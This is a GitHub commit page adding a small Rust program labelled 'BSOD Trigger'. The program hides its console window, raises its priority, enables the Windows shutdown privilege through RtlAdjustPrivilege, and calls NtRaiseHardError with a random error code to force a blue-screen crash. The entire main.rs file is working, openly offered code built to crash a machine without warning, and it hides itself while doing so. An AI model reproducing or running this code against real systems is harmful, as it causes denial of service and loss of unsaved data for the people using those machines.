Skip to content

Commit 76a4160

Browse files
Whitecat18Whitecat18
committed
BSOD Using NtRaiseHardError
1 parent f6836db commit 76a4160

File tree

2 files changed

+74
-0
lines changed

2 files changed

+74
-0
lines changed

BSOD/bsod_NtRaiseHardError/Cargo.toml

Lines changed: 9 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,9 @@
1+
[package]
2+
name = "bsod_NtRaiseHardError"
3+
version = "0.1.0"
4+
edition = "2021"
5+
6+
[dependencies]
7+
ntapi = "0.4.1"
8+
winapi = { version = "0.3.9", features = ["winbase", "winuser", "winnt", "wincon"] }
9+

BSOD/bsod_NtRaiseHardError/src/main.rs

Lines changed: 65 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,65 @@
1+
// BSOD Trigger
2+
// Author: @5mukx
3+
4+
use std::ptr::null_mut;
5+
6+
use ntapi::{ntexapi::NtRaiseHardError, ntrtl::RtlAdjustPrivilege};
7+
use winapi::{shared::{ntdef::{BOOLEAN, NTSTATUS}, ntstatus::STATUS_SUCCESS}, um::{processthreadsapi::{GetCurrentProcess, SetPriorityClass}, winbase::HIGH_PRIORITY_CLASS, wincon::GetConsoleWindow, winuser::{MessageBoxW, ShowWindow, MB_ICONEXCLAMATION, MB_OK, MB_SYSTEMMODAL, SW_HIDE}}};
8+
use std::time::SystemTime;
9+
10+
11+
12+
fn main(){
13+
unsafe{
14+
// new way to hide the console !
15+
let console_window = GetConsoleWindow();
16+
17+
ShowWindow(console_window, SW_HIDE);
18+
19+
SetPriorityClass(GetCurrentProcess(), HIGH_PRIORITY_CLASS);
20+
21+
let mut error_ret = STATUS_SUCCESS;
22+
23+
// enable shutdown privileges !
24+
let mut enabled:BOOLEAN = 0;
25+
let privilege = RtlAdjustPrivilege(19, 1 as BOOLEAN, 0 as BOOLEAN, &mut enabled);
26+
27+
if privilege != STATUS_SUCCESS {
28+
error_ret = privilege;
29+
cleanup(error_ret);
30+
return;
31+
}
32+
33+
// Trigger BSOD
34+
35+
let mut u_resp: u32 = 0;
36+
let random = (SystemTime::now().duration_since(SystemTime::UNIX_EPOCH).unwrap().as_secs() as u32) & 0xF_FFFF;
37+
let bsod_code = 0xC000_0000 | ((random & 0xF00) << 8) | ((random & 0xF0) << 4) | (random & 0xF);
38+
39+
let bsod = NtRaiseHardError(bsod_code as NTSTATUS, 0, 0, null_mut(), 6, &mut u_resp);
40+
41+
if bsod != STATUS_SUCCESS{
42+
error_ret = bsod;
43+
cleanup(error_ret);
44+
return;
45+
}
46+
47+
cleanup(error_ret);
48+
}
49+
}
50+
51+
52+
53+
unsafe fn cleanup(error_ret: NTSTATUS){
54+
if error_ret != STATUS_SUCCESS{
55+
let message = format!("0x{:08X}", error_ret);
56+
let message_wide: Vec<u16> = message.encode_utf16().chain(Some(0)).collect();
57+
58+
MessageBoxW(
59+
null_mut(),
60+
message_wide.as_ptr(),
61+
"Returned\0".as_ptr() as *const u16,
62+
MB_OK | MB_ICONEXCLAMATION | MB_SYSTEMMODAL,
63+
);
64+
}
65+
}

0 commit comments

Comments
 (0)